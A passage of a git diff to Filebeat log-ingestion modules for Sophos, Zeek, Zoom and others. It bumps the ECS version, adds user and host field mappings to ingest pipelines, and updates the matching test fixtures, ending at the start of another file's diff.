-339,6 +351,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "83.97.20.30", "216.167.51.72" diff --git a/x-pack/filebeat/module/sophos/xg/test/wifi.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/wifi.log-expected.json index 64aa8a24494e..0568deab20f2 100644 --- a/x-pack/filebeat/module/sophos/xg/test/wifi.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/wifi.log-expected.json @@ -18,6 +18,9 @@ "observer.serial_number": "S110016E28BA631", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.ap": "A40024A636F7862", "sophos.xg.clients_conn_ssid": "2", @@ -53,6 +56,9 @@ "observer.serial_number": "S110016E28BA631", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.ap": "A40024A636F7862", "sophos.xg.clients_conn_ssid": "3", diff --git a/x-pack/filebeat/module/squid/log/config/input.yml b/x-pack/filebeat/module/squid/log/config/input.yml index c7baa2772dca..16d64b095c6b 100644 --- a/x-pack/filebeat/module/squid/log/config/input.yml +++ b/x-pack/filebeat/module/squid/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/suricata/eve/config/eve.yml b/x-pack/filebeat/module/suricata/eve/config/eve.yml index 8ce699299833..bac91dff1d79 100644 --- a/x-pack/filebeat/module/suricata/eve/config/eve.yml +++ b/x-pack/filebeat/module/suricata/eve/config/eve.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/tomcat/log/config/input.yml b/x-pack/filebeat/module/tomcat/log/config/input.yml index 7cf2dd7ce0af..d8c776349f34 100644 --- a/x-pack/filebeat/module/tomcat/log/config/input.yml +++ b/x-pack/filebeat/module/tomcat/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml b/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml index 73d374965aa6..66a028f309d7 100644 --- a/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml +++ b/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml @@ -22,4 +22,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/connection/config/connection.yml b/x-pack/filebeat/module/zeek/connection/config/connection.yml index 179f20a9043b..71169efdf28f 100644 --- a/x-pack/filebeat/module/zeek/connection/config/connection.yml +++ b/x-pack/filebeat/module/zeek/connection/config/connection.yml @@ -102,4 +102,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml b/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml index f86600e146de..b14165562eae 100644 --- a/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml +++ b/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml b/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml index 9e659922486d..b59227d30df2 100644 --- a/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml +++ b/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml @@ -120,4 +120,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml b/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml index 89a389c597e2..6cd83108b416 100644 --- a/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml +++ b/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml @@ -68,4 +68,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dns/config/dns.yml b/x-pack/filebeat/module/zeek/dns/config/dns.yml index 9381f616b899..731304610340 100644 --- a/x-pack/filebeat/module/zeek/dns/config/dns.yml +++ b/x-pack/filebeat/module/zeek/dns/config/dns.yml @@ -210,4 +210,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dpd/config/dpd.yml b/x-pack/filebeat/module/zeek/dpd/config/dpd.yml index 6d14aa2cd4d5..b7a9c30ec107 100644 --- a/x-pack/filebeat/module/zeek/dpd/config/dpd.yml +++ b/x-pack/filebeat/module/zeek/dpd/config/dpd.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/files/config/files.yml b/x-pack/filebeat/module/zeek/files/config/files.yml index af6fdedb326f..19dfddb9bf5a 100644 --- a/x-pack/filebeat/module/zeek/files/config/files.yml +++ b/x-pack/filebeat/module/zeek/files/config/files.yml @@ -42,4 +42,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ftp/config/ftp.yml b/x-pack/filebeat/module/zeek/ftp/config/ftp.yml index db39c7596370..6acba2ed0c8d 100644 --- a/x-pack/filebeat/module/zeek/ftp/config/ftp.yml +++ b/x-pack/filebeat/module/zeek/ftp/config/ftp.yml @@ -86,4 +86,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/http/config/http.yml b/x-pack/filebeat/module/zeek/http/config/http.yml index d44f361b8af1..25bdbf709d1c 100644 --- a/x-pack/filebeat/module/zeek/http/config/http.yml +++ b/x-pack/filebeat/module/zeek/http/config/http.yml @@ -76,6 +76,7 @@ processors: - {from: "destination.address", to: "destination.ip", type: "ip"} - {from: "destination.port", to: "url.port"} - {from: "http.request.method", to: "event.action"} + - {from: "url.username", to: "user.name"} ignore_missing: true fail_on_error: false - add_fields: @@ -93,4 +94,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/http/test/http-json.log b/x-pack/filebeat/module/zeek/http/test/http-json.log index 733495725a32..82b680f7275d 100644 --- a/x-pack/filebeat/module/zeek/http/test/http-json.log +++ b/x-pack/filebeat/module/zeek/http/test/http-json.log @@ -1,2 +1,2 @@ -{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"17.253.5.203","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"34.206.130.40","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]} \ No newline at end of file +{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"17.253.5.203","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"34.206.130.40","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]} diff --git a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json index 200950e922a4..0b101cda6e1c 100644 --- a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json @@ -43,6 +43,9 @@ "10.178.98.102", "17.253.5.203" ], + "related.user": [ + "user" + ], "service.type": "zeek", "source.address": "10.178.98.102", "source.ip": "10.178.98.102", @@ -53,6 +56,8 @@ "url.domain": "ocsp.apple.com", "url.original": "/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=", "url.port": 80, + "url.username": "user", + "user.name": "user", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "com.apple.trustd/2.0", @@ -66,5 +71,74 @@ "zeek.http.tags": [], "zeek.http.trans_depth": 1, "zeek.session_id": "CCNp8v1SNzY7v9d1Ih" + }, + { + "@timestamp": "2019-01-17T06:36:59.757Z", + "destination.address": "34.206.130.40", + "destination.as.number": 14618, + "destination.as.organization.name": "Amazon.com, Inc.", + "destination.geo.city_name": "Ashburn", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 39.0481, + "destination.geo.location.lon": -77.4728, + "destination.geo.region_iso_code": "US-VA", + "destination.geo.region_name": "Virginia", + "destination.ip": "34.206.130.40", + "destination.port": 80, + "event.action": "get", + "event.category": [ + "network", + "web" + ], + "event.dataset": "zeek.http", + "event.id": "CMnIaR2V8VXyu7EPs", + "event.kind": "event", + "event.module": "zeek", + "event.outcome": "success", + "event.type": [ + "connection", + "info", + "protocol" + ], + "fileset.name": "http", + "http.request.body.bytes": 0, + "http.request.method": "GET", + "http.response.body.bytes": 32, + "http.response.status_code": 200, + "http.version": "1.1", + "input.type": "log", + "log.offset": 574, + "network.community_id": "1:Ol0Btm49e1mxnu/BXm1GM8w5ixY=", + "network.transport": "tcp", + "related.ip": [ + "10.20.8.197", + "34.206.130.40" + ], + "service.type": "zeek", + "source.address": "10.20.8.197", + "source.ip": "10.20.8.197", + "source.port": 35684, + "tags": [ + "zeek.http" + ], + "url.domain": "httpbin.org", + "url.original": "/ip", + "url.port": 80, + "user_agent.device.name": "Other", + "user_agent.name": "curl", + "user_agent.original": "curl/7.58.0", + "user_agent.version": "7.58.0", + "zeek.http.resp_fuids": [ + "FwGPlr1GcKUWWdkXoi" + ], + "zeek.http.resp_mime_types": [ + "text/json" + ], + "zeek.http.status_msg": "OK", + "zeek.http.tags": [], + "zeek.http.trans_depth": 1, + "zeek.session_id": "CMnIaR2V8VXyu7EPs" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/zeek/intel/config/intel.yml b/x-pack/filebeat/module/zeek/intel/config/intel.yml index 15fa51970d25..d48dec70d0e5 100644 --- a/x-pack/filebeat/module/zeek/intel/config/intel.yml +++ b/x-pack/filebeat/module/zeek/intel/config/intel.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/irc/config/irc.yml b/x-pack/filebeat/module/zeek/irc/config/irc.yml index cfc251d86161..58e1d861b13f 100644 --- a/x-pack/filebeat/module/zeek/irc/config/irc.yml +++ b/x-pack/filebeat/module/zeek/irc/config/irc.yml @@ -72,4 +72,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml b/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml index 40ec169b7b12..6035aa9fba29 100644 --- a/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml +++ b/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml @@ -104,4 +104,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/modbus/config/modbus.yml b/x-pack/filebeat/module/zeek/modbus/config/modbus.yml index c1a4e8980b60..759dfc78536c 100644 --- a/x-pack/filebeat/module/zeek/modbus/config/modbus.yml +++ b/x-pack/filebeat/module/zeek/modbus/config/modbus.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/mysql/config/mysql.yml b/x-pack/filebeat/module/zeek/mysql/config/mysql.yml index ebd1675c36ce..b3f5d82d4896 100644 --- a/x-pack/filebeat/module/zeek/mysql/config/mysql.yml +++ b/x-pack/filebeat/module/zeek/mysql/config/mysql.yml @@ -72,4 +72,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/mysql/ingest/pipeline.yml b/x-pack/filebeat/module/zeek/mysql/ingest/pipeline.yml index ce2de3535495..d5552af6d29f 100644 --- a/x-pack/filebeat/module/zeek/mysql/ingest/pipeline.yml +++ b/x-pack/filebeat/module/zeek/mysql/ingest/pipeline.yml @@ -80,6 +80,10 @@ processors: field: event.type value: end if: "ctx?.zeek?.mysql?.cmd != null && ctx.zeek.mysql.cmd == 'connect_out'" +- append: + field: event.category + value: session + if: "ctx?.zeek?.mysql?.cmd != null && (ctx.zeek.mysql.cmd == 'connect' || ctx.zeek.mysql.cmd == 'connect_out')" on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zeek/notice/config/notice.yml b/x-pack/filebeat/module/zeek/notice/config/notice.yml index 8d5fd59ecda4..4b09b7bc41f7 100644 --- a/x-pack/filebeat/module/zeek/notice/config/notice.yml +++ b/x-pack/filebeat/module/zeek/notice/config/notice.yml @@ -104,4 +104,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml b/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml index 5cbc5f405144..bcdf04d899f0 100644 --- a/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml +++ b/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml @@ -86,4 +86,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml b/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml index 7094312427d9..d929f70633f6 100644 --- a/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml +++ b/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml @@ -64,4 +64,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/pe/config/pe.yml b/x-pack/filebeat/module/zeek/pe/config/pe.yml index b0bc5a71b432..34b81b461171 100644 --- a/x-pack/filebeat/module/zeek/pe/config/pe.yml +++ b/x-pack/filebeat/module/zeek/pe/config/pe.yml @@ -33,4 +33,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/radius/config/radius.yml b/x-pack/filebeat/module/zeek/radius/config/radius.yml index 87eb92ff92d8..0779807c8fee 100644 --- a/x-pack/filebeat/module/zeek/radius/config/radius.yml +++ b/x-pack/filebeat/module/zeek/radius/config/radius.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/rdp/config/rdp.yml b/x-pack/filebeat/module/zeek/rdp/config/rdp.yml index 27757d6279f7..f29a099da6bf 100644 --- a/x-pack/filebeat/module/zeek/rdp/config/rdp.yml +++ b/x-pack/filebeat/module/zeek/rdp/config/rdp.yml @@ -88,4 +88,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/rfb/config/rfb.yml b/x-pack/filebeat/module/zeek/rfb/config/rfb.yml index b518662dcceb..0f974ac07d70 100644 --- a/x-pack/filebeat/module/zeek/rfb/config/rfb.yml +++ b/x-pack/filebeat/module/zeek/rfb/config/rfb.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/sip/config/sip.yml b/x-pack/filebeat/module/zeek/sip/config/sip.yml index 09501c99ff81..3530b53ce8b6 100644 --- a/x-pack/filebeat/module/zeek/sip/config/sip.yml +++ b/x-pack/filebeat/module/zeek/sip/config/sip.yml @@ -95,4 +95,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml b/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml index 514e086e76be..7b0ba2dd6dc5 100644 --- a/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml +++ b/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml @@ -101,4 +101,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml b/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml index e61da9cb365c..aa530a6f0de5 100644 --- a/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml +++ b/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml @@ -61,4 +61,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml b/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml index c1e7908205d3..414432e30a64 100644 --- a/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml +++ b/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/smtp/config/smtp.yml b/x-pack/filebeat/module/zeek/smtp/config/smtp.yml index f6abbf966168..cf31baf7d0cf 100644 --- a/x-pack/filebeat/module/zeek/smtp/config/smtp.yml +++ b/x-pack/filebeat/module/zeek/smtp/config/smtp.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/snmp/config/snmp.yml b/x-pack/filebeat/module/zeek/snmp/config/snmp.yml index 1b4587e32982..b508ee874dfa 100644 --- a/x-pack/filebeat/module/zeek/snmp/config/snmp.yml +++ b/x-pack/filebeat/module/zeek/snmp/config/snmp.yml @@ -69,4 +69,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/socks/config/socks.yml b/x-pack/filebeat/module/zeek/socks/config/socks.yml index 72ef4e99d53e..cc486a60c403 100644 --- a/x-pack/filebeat/module/zeek/socks/config/socks.yml +++ b/x-pack/filebeat/module/zeek/socks/config/socks.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ssh/config/ssh.yml b/x-pack/filebeat/module/zeek/ssh/config/ssh.yml index c72f44249889..14e673c3e047 100644 --- a/x-pack/filebeat/module/zeek/ssh/config/ssh.yml +++ b/x-pack/filebeat/module/zeek/ssh/config/ssh.yml @@ -76,4 +76,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ssl/config/ssl.yml b/x-pack/filebeat/module/zeek/ssl/config/ssl.yml index c64a851913de..cf3281a5d76c 100644 --- a/x-pack/filebeat/module/zeek/ssl/config/ssl.yml +++ b/x-pack/filebeat/module/zeek/ssl/config/ssl.yml @@ -94,4 +94,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/stats/config/stats.yml b/x-pack/filebeat/module/zeek/stats/config/stats.yml index 3bbd773979ea..a8fcb0ce6b9d 100644 --- a/x-pack/filebeat/module/zeek/stats/config/stats.yml +++ b/x-pack/filebeat/module/zeek/stats/config/stats.yml @@ -97,4 +97,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/syslog/config/syslog.yml b/x-pack/filebeat/module/zeek/syslog/config/syslog.yml index cecb93d857d3..167e7ea95690 100644 --- a/x-pack/filebeat/module/zeek/syslog/config/syslog.yml +++ b/x-pack/filebeat/module/zeek/syslog/config/syslog.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml b/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml index 47bc7d2f99c7..35671bd15a46 100644 --- a/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml +++ b/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml @@ -45,4 +45,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml b/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml index 0186311141c7..8bf2bd3ed48b 100644 --- a/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml +++ b/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/weird/config/weird.yml b/x-pack/filebeat/module/zeek/weird/config/weird.yml index 4d3248b4515e..317001ec2e44 100644 --- a/x-pack/filebeat/module/zeek/weird/config/weird.yml +++ b/x-pack/filebeat/module/zeek/weird/config/weird.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/x509/config/x509.yml b/x-pack/filebeat/module/zeek/x509/config/x509.yml index 25b4c0a54197..0f9b418e4fa0 100644 --- a/x-pack/filebeat/module/zeek/x509/config/x509.yml +++ b/x-pack/filebeat/module/zeek/x509/config/x509.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zoom/webhook/config/webhook.yml b/x-pack/filebeat/module/zoom/webhook/config/webhook.yml index 6c2ed13fdbad..34f0d4a6a549 100644 --- a/x-pack/filebeat/module/zoom/webhook/config/webhook.yml +++ b/x-pack/filebeat/module/zoom/webhook/config/webhook.yml @@ -34,4 +34,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/account.yml b/x-pack/filebeat/module/zoom/webhook/ingest/account.yml index c5368f0ab05f..605ea1974ff3 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/account.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/account.yml @@ -37,10 +37,80 @@ processors: field: zoom.object target_field: zoom.account ignore_missing: true +# +# set user.target from account.owner_* fields (create / delete account). +# +- set: + field: user.target.id + value: '{{zoom.account.owner_id}}' + ignore_empty_value: true +- set: + field: user.target.email + value: '{{zoom.account.owner_email}}' + ignore_empty_value: true + +# +# set user.target from old_values.account_* fields (updated account). +# +- set: + field: user.target.id + value: '{{zoom.old_values.id}}' + if: 'ctx.zoom?.old_values?.id != null' +- set: + field: user.target.email + value: '{{zoom.old_values.account_email}}' + if: 'ctx.zoom?.old_values?.account_email != null' +- set: + field: user.target.full_name + value: '{{zoom.old_values.account_name}}' + if: 'ctx.zoom?.old_values?.account_name != null' +- set: + field: user.target.name + value: '{{zoom.old_values.account_alias}}' + if: 'ctx.zoom?.old_values?.account_alias != null' + +# +# set user.changes from account.account_* fields (updated account). +# +- set: + field: user.changes.id + value: '{{zoom.account.id}}' + if: 'ctx.zoom?.account?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.account?.id' +- set: + field: user.changes.email + value: '{{zoom.account.account_email}}' + if: 'ctx.zoom?.account?.account_email != null && ctx.zoom?.old_values?.account_email != ctx.zoom?.account?.account_email' +- set: + field: user.changes.full_name + value: '{{zoom.account.account_name}}' + if: 'ctx.zoom?.account?.account_name != null && ctx.zoom?.old_values?.account_name != ctx.zoom?.account?.account_name' +- set: + field: user.changes.name + value: '{{zoom.account.account_alias}}' + if: 'ctx.zoom?.account?.account_alias != null && ctx.zoom?.old_values?.account_alias != ctx.zoom?.account?.account_alias' + +# +# Append to related.user array +# - append: field: related.user value: "{{zoom.account.owner_id}}" - if: ctx?.zoom?.account?.owner_id != null + allow_duplicates: false + if: ctx.zoom?.account?.owner_id != null +- append: + field: related.user + value: "{{user.target.id}}" + allow_duplicates: false + if: ctx.user?.target?.id != null +- append: + field: related.user + value: "{{user.changes.id}}" + allow_duplicates: false + if: ctx.user?.changes?.id != null + +# +# Cleanup +# - remove: field: zoom.time_stamp ignore_missing: true diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/chat_channel.yml b/x-pack/filebeat/module/zoom/webhook/ingest/chat_channel.yml index 8f3140d2799b..98d6fcbcd900 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/chat_channel.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/chat_channel.yml @@ -44,6 +44,7 @@ processors: if: ctx?.zoom?.chat_channel?.timestamp != null - foreach: field: zoom.chat_channel.members + ignore_missing: true processor: append: field: related.user diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/meeting.yml b/x-pack/filebeat/module/zoom/webhook/ingest/meeting.yml index e0012edf8e4d..9291add35933 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/meeting.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/meeting.yml @@ -45,10 +45,47 @@ processors: target_field: url.full ignore_missing: true if: ctx?.url?.full == null + +# +# Set user.* from participant, if any. +# +- remove: + field: + - user + ignore_missing: true + if: 'ctx.zoom?.participant != null' +- set: + field: user.id + value: '{{zoom.participant.id}}' + ignore_empty_value: true +- set: + field: user.full_name + value: '{{zoom.participant.user_name}}' + ignore_empty_value: true + +# +# Set user.id to be the meeting's host, unless already set. +# +- set: + field: user.id + value: '{{zoom.meeting.host_id}}' + ignore_empty_value: true + override: false + +# +# Append to related.user +# +- append: + field: related.user + value: "{{zoom.participant.id}}" + allow_duplicates: false + if: 'ctx.zoom?.participant?.id != null' - append: field: related.user value: "{{zoom.meeting.host_id}}" - if: ctx?.zoom?.meeting?.host_id != null + allow_duplicates: false + if: 'ctx.zoom?.meeting?.host_id != null' + - date: field: zoom.meeting.start_time target_field: event.start diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/phone.yml b/x-pack/filebeat/module/zoom/webhook/ingest/phone.yml index 2e363e3da422..b836cd9c96c4 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/phone.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/phone.yml @@ -140,19 +140,30 @@ processors: - append: field: related.user value: "{{zoom.phone.callee.user_id}}" + allow_duplicates: false if: ctx?.zoom?.phone?.callee?.user_id != null - append: field: related.user value: "{{zoom.phone.callee_user_id}}" + allow_duplicates: false if: ctx?.zoom?.phone?.callee_user_id != null - append: field: related.user value: "{{zoom.phone.caller.user_id}}" + allow_duplicates: false if: ctx?.zoom?.phone?.caller?.user_id != null - remove: field: zoom.phone.date_time ignore_missing: true if: ctx?.event?.action == 'phone.voicemail_received' +- set: + field: source.user.id + value: '{{zoom.phone.caller.user_id}}' + ignore_empty_value: true +- set: + field: destination.user.id + value: '{{zoom.phone.callee.user_id}}' + ignore_empty_value: true on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/pipeline.yml 